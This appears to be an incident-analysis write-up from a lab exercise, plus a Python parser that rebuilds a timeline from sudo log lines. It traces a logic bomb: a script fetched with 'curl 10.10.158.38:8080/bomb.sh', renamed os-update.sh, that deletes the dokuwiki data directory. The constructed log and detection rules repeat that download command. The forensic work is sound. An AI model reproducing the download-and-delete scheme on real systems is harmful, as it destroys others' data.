A user installed a package named dokuwiki with the full command /usr/bin/apt install dokuwiki on Dec 28, 2022 at 06:17:30. The package was installed in the /home/cybert directory. After the package was installed, the it-admin user was created and given sudo (root) privileges in the sudoers file at Dec 28 06:27:34. At Dec 28 06:29:14, bomb.sh was opened in the vi text editor. bomb.sh was created with the command curl 10.10.158.38:8080/bomb.sh --output bomb.sh, so it came from the web; curl fetches data from a URL. The bomb.sh file was opened in vim, saved as /bin/os-update.sh on Dec 28 06:29, and the original file was deleted. os-update.sh runs every day at 8 AM. It contains a malicious command that deletes /var/lib/dokuwiki if it-admin has not logged in for 90 days.
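
An added example, not part of the original write-up: a small Python parser that rebuilds this kind of timeline from sudo entries, assuming the commands were recorded in the usual auth.log "sudo: ... COMMAND=" format. The sample lines, the host and user names, and the adduser and curl timestamps are constructed; the rule names are hypothetical.

```python
import re
from datetime import datetime

# Constructed sample in auth.log sudo format (an assumption; not taken from the page).
SAMPLE_LOG = """\
Dec 28 06:17:30 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:26:52 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:27:34 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:28:50 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/curl 10.10.158.38:8080/bomb.sh --output bomb.sh
Dec 28 06:29:14 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
Dec 28 06:30:01 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/ls
"""

# One sudo entry: timestamp, invoking user, working directory, full command.
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssudo:\s+(?P<user>\S+)\s:"
    r".*?PWD=(?P<pwd>\S+)\s;.*?COMMAND=(?P<cmd>.+)$"
)

# Hypothetical triage rules matching the kinds of activity in the write-up.
RULES = [
    ("package-install", re.compile(r"\b(apt|apt-get|dpkg)\s+(install|-i)\b")),
    ("account-creation", re.compile(r"\b(adduser|useradd)\b")),
    ("sudoers-change", re.compile(r"\bvisudo\b|/etc/sudoers")),
    ("remote-download", re.compile(r"\b(curl|wget)\b")),
    ("editor-as-root", re.compile(r"/(vi|vim|nano)\b")),
]

def build_timeline(log_text, year=2022):
    """Return flagged sudo events as (time, user, pwd, tags, command), oldest first."""
    events = []
    for line in log_text.splitlines():
        m = SUDO_RE.match(line)
        if not m:
            continue  # not a sudo COMMAND entry
        tags = [name for name, rx in RULES if rx.search(m["cmd"])]
        if tags:
            # Syslog timestamps carry no year, so the caller supplies it.
            when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((when, m["user"], m["pwd"], tags, m["cmd"]))
    return sorted(events, key=lambda e: e[0])

if __name__ == "__main__":
    for when, user, pwd, tags, cmd in build_timeline(SAMPLE_LOG):
        print(f"{when:%b %d %H:%M:%S}  {user:<8} {pwd:<14} {','.join(tags):<17} {cmd}")
```
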